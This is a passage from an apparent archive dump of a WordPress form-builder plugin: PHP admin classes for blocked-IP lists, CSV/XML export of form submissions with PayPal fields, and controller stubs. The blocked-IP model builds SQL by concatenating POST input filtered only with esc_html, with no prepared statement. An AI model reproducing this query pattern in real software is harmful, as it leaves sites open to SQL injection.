  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFormcontactwdcaptcha.php000060400000004333152434416630015201 0ustar00<?php

class FMModelFormcontactwdcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelBlocked_ips_fmc.php000060400000007767152434416630014124 0ustar00<?php

class FMModelBlocked_ips_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function get_rows_data() {
    global $wpdb;
    $where = ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE `ip` LIKE "%' . esc_html($_POST['search_value']) . '%"' : '');
    $asc_or_desc = ((isset($_POST['asc_or_desc']) && $_POST['asc_or_desc'] == 'desc') ? 'desc' : 'asc');
	$order_by_array = array('id', 'ip');
    $order_by = isset($_POST['order_by']) && in_array(esc_html(stripslashes($_POST['order_by'])), $order_by_array) ? esc_html(stripslashes($_POST['order_by'])) :  'id';
    $order_by = ' ORDER BY `' . $order_by . '` ' . $asc_or_desc;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $query = "SELECT * FROM " . $wpdb->prefix . "formmaker_blocked " . $where . $order_by . " LIMIT " . $limit . ",20";
    $rows = $wpdb->get_results($query);
    return $rows;
  }
  
  public function get_row_data($id) {
    global $wpdb;
    if ($id != 0) {
      $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE id="%d"', $id));
    }
    else {
      $row->id = 0;
      $row->ip = '';
    }
    return $row;
  }

  public function page_nav() {
    global $wpdb;
    $where = ((isset($_POST['search_value']) && (esc_html($_POST['search_value']) != '')) ? 'WHERE `ip` LIKE "%' . esc_html($_POST['search_value']) . '%"'  : '');
    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "formmaker_blocked " . $where;
    $total = $wpdb->get_var($query);
    $page_nav['total'] = $total;
    if (isset($_POST['page_number']) && $_POST['page_number']) {
      $limit = ((int) $_POST['page_number'] - 1) * 20;
    }
    else {
      $limit = 0;
    }
    $page_nav['limit'] = (int) ($limit / 20 + 1);
    return $page_nav;
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelLicensing_fmc.php000060400000004323152434416630013602 0ustar00<?php

class FMModelLicensing_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelGenerete_csv_fmc.php000060400000030443152434416630014302 0ustar00<?php

class FMModelGenerete_csv_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
	public function get_data() {
		global $wpdb;
		$is_paypal_info = FALSE;
		$params = array();
		$group_id_s = array();
		$form_id = (int)$_REQUEST['form_id'];
		$limitstart = (int)$_REQUEST['limitstart'];
			
		$paypal_info_fields = array('currency', 'ord_last_modified', 'status', 'full_name', 'fax', 'mobile_phone', 'email', 'phone', 'address', 'paypal_info',  'ipn', 'tax', 'shipping');
		$paypal_info_labels = array( 'Currency', 'Last modified', 'Status', 'Full Name', 'Fax', 'Mobile phone', 'Email', 'Phone', 'Address', 'Paypal info', 'IPN', 'Tax', 'Shipping');
		
		$query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d", $form_id);		
		$group_id_s = $wpdb->get_col($query);	

		$query = $wpdb->prepare("SELECT distinct element_label FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d",$form_id);	
		$labels = $wpdb->get_col($query);
		
		$query_lable = $wpdb->prepare("SELECT label_order,title FROM " . $wpdb->prefix . "formmaker where id=%d", $form_id);
		$rows_lable = $wpdb->get_results($query_lable);
		$ptn = "/[^a-zA-Z0-9_]/";
		$rpltxt = "";
		$title = isset($rows_lable[0]) ? preg_replace($ptn, $rpltxt, $rows_lable[0]->title) : '';
		
		$sorted_labels_id = array();
		$sorted_labels = array();
		$label_titles = array();
		$label_id = array();
		$label_order = array();
		$label_order_original = array();
		$label_type = array();
		if ($labels) {
			$label_all = explode('#****#', $rows_lable[0]->label_order);
			$label_all = array_slice($label_all, 0, count($label_all) - 1);
			foreach ($label_all as $key => $label_each) {
				$label_id_each = explode('#**id**#', $label_each);
				array_push($label_id, $label_id_each[0]);
				$label_oder_each = explode('#**label**#', $label_id_each[1]);
				array_push($label_order_original, $label_oder_each[0]);
				$label_temp = preg_replace($ptn, $rpltxt, $label_oder_each[0]);
				array_push($label_order, $label_temp);
				array_push($label_type, $label_oder_each[1]);
			}
			foreach ($label_id as $key => $label) {
				if (in_array($label, $labels) && $label_type[$key] !='type_arithmetic_captcha') {
					array_push($sorted_labels, $label_order[$key]);
					array_push($sorted_labels_id, $label);
					array_push($label_titles, stripslashes($label_order_original[$key]));
				}
			}
		}

		$m = count($sorted_labels);
		$wpdb->query("SET SESSION group_concat_max_len = 1000000");
		
		$query = $wpdb->prepare("SELECT group_id, ip, date, user_id_wd, GROUP_CONCAT( element_label SEPARATOR ',') as element_label, GROUP_CONCAT( element_value SEPARATOR '*:*el_value*:*') as element_value FROM " . $wpdb->prefix . "formmaker_submits where form_id= %d GROUP BY group_id ORDER BY date ASC limit %d, %d", $form_id, $limitstart, 1000);
		$rows = $wpdb->get_results($query, OBJECT_K);

		$data = array();
		$group_id_s_count = $limitstart + 1000 < count($group_id_s) ? $limitstart + 1000 : count($group_id_s);

		for ($www = $limitstart; $www < $group_id_s_count; $www++) {
			$i = $group_id_s[$www];
			$field_key = array_search($i, $label_id);
			if($label_type[$field_key] != 'type_arithmetic_captcha') {
				$data_temp = array();
				$tt = $rows[$i];

				$date = $tt->date;
				$ip = $tt->ip;
				$user_id = get_userdata($tt->user_id_wd);
				$username = $user_id ? $user_id->display_name : "";
				$useremail = $user_id ? $user_id->user_email : "";
				$data_temp['Submit date'] = $date;
				$data_temp['Ip']=$ip;
				$data_temp['Submitter\'s Username']=$username;
				$data_temp['Submitter\'s Email Address']=$useremail;
			
				$element_labels = explode(',', $tt->element_label);
				$element_values = explode('*:*el_value*:*', $tt->element_value);
				for ($h = 0; $h < $m; $h++) {
					if(isset($data_temp[$label_titles[$h]]))
						$label_titles[$h] .= '(1)';
					
					if(in_array($sorted_labels_id[$h], $element_labels)) {
						$element_value = $element_values[array_search($sorted_labels_id[$h], $element_labels)];
				
						if (strpos($element_value, "*@@url@@*")) {
							$file_names = '';
							$new_files = explode("*@@url@@*", $element_value);
							foreach ($new_files as $new_file) {
								if ($new_file) {
									$file_names .= $new_file . ", ";
								}
							}
							$data_temp[stripslashes($label_titles[$h])] = $file_names;
						}
						elseif (strpos($element_value, "***br***")) {
							$element_value = str_replace("***br***", ', ', $element_value);
							if (strpos($element_value, "***quantity***")) {
								$element_value = str_replace("***quantity***", '', $element_value);
							}
							if (strpos($element_value, "***property***")) {
								$element_value = str_replace("***property***", '', $element_value);
							}
							if(substr($element_value, -2) == ', ') {
								$data_temp[stripslashes($label_titles[$h])]= substr($element_value, 0, -2);
							}
							else {
								$data_temp[stripslashes($label_titles[$h])]= $element_value;
							}
						}
						elseif (strpos($element_value, "***map***")) {
							$data_temp[stripslashes($label_titles[$h])] = 'Longitude:' . str_replace("***map***", ', Latitude:', $element_value);
						}
						elseif (strpos($element_value, "***star_rating***")) {
							$element = str_replace("***star_rating***", '', $element_value);
							$element = explode("***", $element);
							$data_temp[stripslashes($label_titles[$h])] = ' ' . $element[1] . '/' . $element[0];
						}
						elseif (strpos($element_value, "@@@") || $element_value == "@@@" || $element_value == "@@@@@@@@@") {
							$data_temp[stripslashes($label_titles[$h])] = str_replace("@@@", ' ', $element_value);
						}
						elseif (strpos($element_value, "***grading***")) {
							$element = str_replace("***grading***", '', $element_value);
							$grading = explode(":", $element);
							$items_count = sizeof($grading) - 1;
							$items = "";
							$total = "";
							for ($k = 0; $k < $items_count / 2; $k++) {
								$items .= $grading[$items_count / 2 + $k] . ": " . $grading[$k] . ", ";
								$total += $grading[$k];
							}
							$items .= "Total: " . $total;
								$data_temp[stripslashes($label_titles[$h])] = $items;
						}
						elseif (strpos($element_value, "***matrix***")) {
							$element = str_replace("***matrix***", '', $element_value);
							$matrix_value = explode('***', $element);
							$matrix_value = array_slice($matrix_value, 0, count($matrix_value) - 1);
							$mat_rows = $matrix_value[0];
							$mat_columns = $matrix_value[$mat_rows + 1];
							$matrix = "";
							$aaa = array();
							$var_checkbox = 1;
							$selected_value = "";
							$selected_value_yes = "";
							$selected_value_no = "";
							for ($k = 1; $k <= $mat_rows; $k++) {
								if ($matrix_value[$mat_rows + $mat_columns + 2] == "radio") {
									if ($matrix_value[$mat_rows + $mat_columns + 2 + $k] == 0) {
										$checked = "0";
										$aaa[1] = "";
									}
									else {
										$aaa = explode("_", $matrix_value[$mat_rows + $mat_columns + 2 + $k]);
									}
									for ($l = 1; $l <= $mat_columns; $l++) {
										$checked = $aaa[1] == $l ? '1' : '0';
										$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$checked."; ";
									}
								}
								else {
									if ($matrix_value[$mat_rows+$mat_columns + 2] == "checkbox") {
										for ($l = 1; $l <= $mat_columns; $l++) {
											$checked = $matrix_value[$mat_rows+$mat_columns + 2 + $var_checkbox] == 1 ? '1' : '0';
											$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$checked."; ";
											$var_checkbox++;
										}
									}
									else {
										if ($matrix_value[$mat_rows+$mat_columns + 2] == "text") {
											for ($l = 1; $l <= $mat_columns; $l++) {
												$text_value = $matrix_value[$mat_rows+$mat_columns+2+$var_checkbox];
												$matrix .='['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$text_value."; ";
												$var_checkbox++;
											}
										}
										else {
											for ($l = 1; $l <= $mat_columns; $l++) {
												$selected_text = $matrix_value[$mat_rows+$mat_columns + 2 + $var_checkbox];
												$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows + 1 + $l].']='.$selected_text."; ";
												$var_checkbox++;
											}
										}
									}
								}
							}
							$data_temp[stripslashes($label_titles[$h])] = $matrix;
						}
						else {
							$val = htmlspecialchars_decode($element_value);
							$val = stripslashes(str_replace('&#039;', "'", $val));
							$data_temp[stripslashes($label_titles[$h])] = ($element_value ? $val : '');
						}
					}
					else						
						$data_temp[stripslashes($label_titles[$h])] = '';
				}
			
				$query = $wpdb->prepare("SELECT id FROM " . $wpdb->prefix . "formmaker_submits where element_label=%s AND form_id = %d AND group_id=%d",'item_total', $form_id, $i);	
				$is_paypal = $wpdb->get_results($query);
			
				if($is_paypal) {
					$item_total = $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s", $i, 'item_total'));        
					$total = $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s", $i, 'total'));        
					$payment_status = $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s", $i, '0'));        
					$data_temp['Item Total'] = $item_total;
					$data_temp['Total'] = $total;
					$data_temp['Payment Status'] = $payment_status;
				}
				$query = $wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker_sessions where group_id=%d",$i);
				$paypal_info = $wpdb->get_results($query);
				if ($paypal_info) {
					$is_paypal_info = TRUE;
				}
				if ($is_paypal) {
					foreach ($paypal_info_fields as $key=>$paypal_info_field) {
						if ($paypal_info) {
							$data_temp['PAYPAL_'.$paypal_info_labels[$key]]=$paypal_info[0]->$paypal_info_field;
						}
						else {
							$data_temp['PAYPAL_'.$paypal_info_labels[$key]]='';
						}
					}
				}
				
				$data[$i] = $data_temp;
			} 
		}

		array_push($params, $data);
		array_push($params, $title);
		array_push($params, $is_paypal_info);

		return $params;	

	}
  
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelFormMakerEditCSS_fmc.php000060400000005146152434416630014735 0ustar00<?php

class FMModelFormMakerEditCSS_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function get_theme_row($id) {
    global $wpdb;
    $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker_themes WHERE id="%d"', $id));
    return $row;
  }

  /*public function get_form($form_id) {
    global $wpdb;
    $form = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $form_id));
    return $form;
  }*/
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/models/FMModelGenerete_xml_fmc.php000060400000030107152434416630014304 0ustar00<?php

class FMModelGenerete_xml_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function get_data() {
		global $wpdb;
		$is_paypal_info = FALSE;
		$params = array();
		$group_id_s = array();
		$form_id = (int)$_REQUEST['form_id'];
		$limitstart = (int)$_REQUEST['limitstart'];
			
		$paypal_info_fields = array('currency', 'ord_last_modified', 'status', 'full_name', 'fax', 'mobile_phone', 'email', 'phone', 'address', 'paypal_info',  'ipn', 'tax', 'shipping');
		$paypal_info_labels = array( 'Currency', 'Last modified', 'Status', 'Full Name', 'Fax', 'Mobile phone', 'Email', 'Phone', 'Address', 'Paypal info', 'IPN', 'Tax', 'Shipping');
		
		$query = $wpdb->prepare("SELECT distinct group_id FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d", $form_id);		
		$group_id_s = $wpdb->get_col($query);	

		$query = $wpdb->prepare("SELECT distinct element_label FROM " . $wpdb->prefix . "formmaker_submits where form_id=%d",$form_id);	
		$labels = $wpdb->get_col($query);
		
		$query_lable = $wpdb->prepare("SELECT label_order,title FROM " . $wpdb->prefix . "formmaker where id=%d", $form_id);
		$rows_lable = $wpdb->get_results($query_lable);
		$ptn = "/[^a-zA-Z0-9_]/";
		$rpltxt = "";
		$title = isset($rows_lable[0]) ? preg_replace($ptn, $rpltxt, $rows_lable[0]->title) : '';
		
		$sorted_labels_id = array();
		$sorted_labels = array();
		$label_titles = array();
		$label_id = array();
		$label_order = array();
		$label_order_original = array();
		$label_type = array();
		if ($labels) {
			$label_all = explode('#****#', $rows_lable[0]->label_order);
			$label_all = array_slice($label_all, 0, count($label_all) - 1);
			foreach ($label_all as $key => $label_each) {
				$label_id_each = explode('#**id**#', $label_each);
				array_push($label_id, $label_id_each[0]);
				$label_oder_each = explode('#**label**#', $label_id_each[1]);
				array_push($label_order_original, $label_oder_each[0]);
				$label_temp = preg_replace($ptn, $rpltxt, $label_oder_each[0]);
				array_push($label_order, $label_temp);
				array_push($label_type, $label_oder_each[1]);
			}
			foreach ($label_id as $key => $label) {
				if (in_array($label, $labels) && $label_type[$key] !='type_arithmetic_captcha') {
					array_push($sorted_labels, $label_order[$key]);
					array_push($sorted_labels_id, $label);
					array_push($label_titles, stripslashes($label_order_original[$key]));
				}
			}
		}

		$m = count($sorted_labels);
		
		$query = $wpdb->prepare("SELECT group_id, ip, date, user_id_wd, GROUP_CONCAT( element_label SEPARATOR ',') as element_label, GROUP_CONCAT( element_value SEPARATOR '*:*el_value*:*') as element_value FROM " . $wpdb->prefix . "formmaker_submits where form_id= %d GROUP BY group_id ORDER BY date ASC limit %d, %d", $form_id, $limitstart, 1000);
		$rows = $wpdb->get_results($query, OBJECT_K);

		$data = array();
		$group_id_s_count = $limitstart + 1000 < count($group_id_s) ? $limitstart + 1000 : count($group_id_s);

		for ($www = $limitstart; $www < $group_id_s_count; $www++) {
			$i = $group_id_s[$www];
			$field_key = array_search($i, $label_id);
			if($label_type[$field_key] != 'type_arithmetic_captcha') {
				$data_temp = array();
				$tt = $rows[$i];

				$date = $tt->date;
				$ip = $tt->ip;
				$user_id = get_userdata($tt->user_id_wd);
				$username = $user_id ? $user_id->display_name : "";
				$useremail = $user_id ? $user_id->user_email : "";
				$data_temp['Submit date'] = $date;
				$data_temp['Ip']=$ip;
				$data_temp['Submitter\'s Username']=$username;
				$data_temp['Submitter\'s Email Address']=$useremail;
			
				$element_labels = explode(',', $tt->element_label);
				$element_values = explode('*:*el_value*:*', $tt->element_value);
				for ($h = 0; $h < $m; $h++) {
					if(isset($data_temp[$label_titles[$h]]))
						$label_titles[$h] .= '(1)';
					
					if(in_array($sorted_labels_id[$h], $element_labels)) {
						$element_value = $element_values[array_search($sorted_labels_id[$h], $element_labels)];
				
						if (strpos($element_value, "*@@url@@*")) {
							$file_names = '';
							$new_files = explode("*@@url@@*", $element_value);
							foreach ($new_files as $new_file) {
								if ($new_file) {
									$file_names .= $new_file . ", ";
								}
							}
							$data_temp[stripslashes($label_titles[$h])] = $file_names;
						}
						elseif (strpos($element_value, "***br***")) {
							$element_value = str_replace("***br***", ', ', $element_value);
							if (strpos($element_value, "***quantity***")) {
								$element_value = str_replace("***quantity***", '', $element_value);
							}
							if (strpos($element_value, "***property***")) {
								$element_value = str_replace("***property***", '', $element_value);
							}
							if(substr($element_value, -2) == ', ') {
								$data_temp[stripslashes($label_titles[$h])]= substr($element_value, 0, -2);
							}
							else {
								$data_temp[stripslashes($label_titles[$h])]= $element_value;
							}
						}
						elseif (strpos($element_value, "***map***")) {
							$data_temp[stripslashes($label_titles[$h])] = 'Longitude:' . str_replace("***map***", ', Latitude:', $element_value);
						}
						elseif (strpos($element_value, "***star_rating***")) {
							$element = str_replace("***star_rating***", '', $element_value);
							$element = explode("***", $element);
							$data_temp[stripslashes($label_titles[$h])] = ' ' . $element[1] . '/' . $element[0];
						}
						elseif (strpos($element_value, "@@@") || $element_value == "@@@" || $element_value == "@@@@@@@@@") {
							$data_temp[stripslashes($label_titles[$h])] = str_replace("@@@", ' ', $element_value);
						}
						elseif (strpos($element_value, "***grading***")) {
							$element = str_replace("***grading***", '', $element_value);
							$grading = explode(":", $element);
							$items_count = sizeof($grading) - 1;
							$items = "";
							$total = "";
							for ($k = 0; $k < $items_count / 2; $k++) {
								$items .= $grading[$items_count / 2 + $k] . ": " . $grading[$k] . ", ";
								$total += $grading[$k];
							}
							$items .= "Total: " . $total;
								$data_temp[stripslashes($label_titles[$h])] = $items;
						}
						elseif (strpos($element_value, "***matrix***")) {
							$element = str_replace("***matrix***", '', $element_value);
							$matrix_value = explode('***', $element);
							$matrix_value = array_slice($matrix_value, 0, count($matrix_value) - 1);
							$mat_rows = $matrix_value[0];
							$mat_columns = $matrix_value[$mat_rows + 1];
							$matrix = "";
							$aaa = array();
							$var_checkbox = 1;
							$selected_value = "";
							$selected_value_yes = "";
							$selected_value_no = "";
							for ($k = 1; $k <= $mat_rows; $k++) {
								if ($matrix_value[$mat_rows + $mat_columns + 2] == "radio") {
									if ($matrix_value[$mat_rows + $mat_columns + 2 + $k] == 0) {
										$checked = "0";
										$aaa[1] = "";
									}
									else {
										$aaa = explode("_", $matrix_value[$mat_rows + $mat_columns + 2 + $k]);
									}
									for ($l = 1; $l <= $mat_columns; $l++) {
										$checked = $aaa[1] == $l ? '1' : '0';
										$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$checked."; ";
									}
								}
								else {
									if ($matrix_value[$mat_rows+$mat_columns + 2] == "checkbox") {
										for ($l = 1; $l <= $mat_columns; $l++) {
											$checked = $matrix_value[$mat_rows+$mat_columns + 2 + $var_checkbox] == 1 ? '1' : '0';
											$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$checked."; ";
											$var_checkbox++;
										}
									}
									else {
										if ($matrix_value[$mat_rows+$mat_columns + 2] == "text") {
											for ($l = 1; $l <= $mat_columns; $l++) {
												$text_value = $matrix_value[$mat_rows+$mat_columns+2+$var_checkbox];
												$matrix .='['.$matrix_value[$k].','.$matrix_value[$mat_rows+1+$l].']='.$text_value."; ";
												$var_checkbox++;
											}
										}
										else {
											for ($l = 1; $l <= $mat_columns; $l++) {
												$selected_text = $matrix_value[$mat_rows+$mat_columns + 2 + $var_checkbox];
												$matrix .= '['.$matrix_value[$k].','.$matrix_value[$mat_rows + 1 + $l].']='.$selected_text."; ";
												$var_checkbox++;
											}
										}
									}
								}
							}
							$data_temp[stripslashes($label_titles[$h])] = $matrix;
						}
						else {
							$val = htmlspecialchars_decode($element_value);
							$val = stripslashes(str_replace('&#039;', "'", $val));
							$data_temp[stripslashes($label_titles[$h])] = ($element_value ? $val : '');
						}
					}
					else						
						$data_temp[stripslashes($label_titles[$h])] = '';
				}
			
				$item_total = $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s",$i,'item_total'));
		
				$total = $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s",$i,'total'));
			
				$payment_status =   $wpdb->get_var($wpdb->prepare("SELECT `element_value` FROM " . $wpdb->prefix . "formmaker_submits where group_id=%d AND element_label=%s",$i,'0'));
			
			
				if($item_total)
					$data_temp['Item Total'] = $item_total;
				
				if($total)	
					$data_temp['Total'] = $total;
				
				if($payment_status)	
					$data_temp['Payment Status'] = $payment_status;
		  
				$query = $wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker_sessions where group_id= %d", $i);
		  
		  
		  
				$paypal_info = $wpdb->get_results($query);
				if ($paypal_info) {
					$is_paypal_info = TRUE;
				}
				if ($is_paypal_info) {
					foreach ($paypal_info_fields as $key=>$paypal_info_field) {
						if ($paypal_info) {
							$data_temp['PAYPAL_' . $paypal_info_labels[$key]] = $paypal_info[0]->$paypal_info_field;
						}
						else {
							$data_temp['PAYPAL_' . $paypal_info_labels[$key]] = '';
						}
					}
				}
			
				$data[$i] = $data_temp;
			} 
		}

		array_push($params, $data);
		array_push($params, $title);
		array_push($params, $is_paypal_info);

		return $params;	

	}
  
  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFormcontactwdmathcaptcha.php000060400000005146152434416630020224 0ustar00<?php

class FMControllerFormcontactwdmathcaptcha {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFormcontactwdmathcaptcha.php";
    $model = new FMModelFormcontactwdmathcaptcha();

    require_once WD_FMC_DIR . "/admin/views/FMViewFormcontactwdmathcaptcha.php";
    $view = new FMViewFormcontactwdmathcaptcha($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFormMakerPreview_fmc.php000060400000005122152434416630017260 0ustar00<?php

class FMControllerFormMakerPreview_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
